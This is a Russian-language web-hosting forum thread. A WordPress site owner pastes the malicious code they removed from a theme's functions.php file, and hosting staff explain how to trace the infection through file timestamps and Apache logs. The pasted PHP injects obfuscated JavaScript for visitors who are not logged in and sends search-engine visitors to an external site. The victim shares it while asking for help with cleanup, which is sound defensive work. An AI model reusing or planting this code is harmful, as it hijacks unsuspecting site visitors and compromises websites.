CMS WordPress. Вирус JS:Redirector-MR [Trj]

eleshevich.av
12 років
0
Напала вот такая беда JS:Redirector-MR [Trj] аваст среагировал.
видоизменяла файлы в теме шаблола functions.php

(явно мне не припёрло редактировать шаблон в 4 утра)я сравнил изначальный код шаблона и вырезал вот такой кусок (вируса) и постави права на фаил только чтение

<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
}
}
}
?>


где он ещё мог прописаться?
и какие поставить плагины для безопасности? или кто чем поможет?
rudenko
12 років
0
Как показывает практика плагины к CMS создают только дополнительные дыры. Те плагины с дырами, про которые мы знаем мы защищаем через настройки виртуального хоста, блокируя использование уязвимости злоумышленниками. В каждом конкретном случае нужно искать источник через который осуществляется заражение. Для этого нужно не трогать зараженный файл, а посмотреть дату его модификации, после чего проанализировать логи Apache за этот период и найти POST запросы, которые были сделаны в это время. Тогда вы сможете найти источник заражения.
eleshevich.av
12 років
0
Илья, спасибо за ответ.
Подскажите как вышеописанное осуществить, писать тикет в техсапорт, мои два сайта были заражены в ночь с 30.01.11 на 31.01.11 (я быстро отреагировал точной даты модификации файла не сохранилось)
rudenko
12 років
0
Есть два варианта - самостоятельно решить вопрос, либо написать в техподдержку с пометкой "для антивируса". Но это делать надо до того как вы изменили файл, так как в таком случае найти источник не сможем. Мы просто сейчас пишем небольшой антивирус, который проверяет некоторые распространенные уязвимости плюс есть система, которая определяет версии установленных CMS и закрывает дыры. Конечно гарантировать закрытие всех уязвимостей не можем, но если находим закономерность, то решаем этот вопрос.
Тема закрита.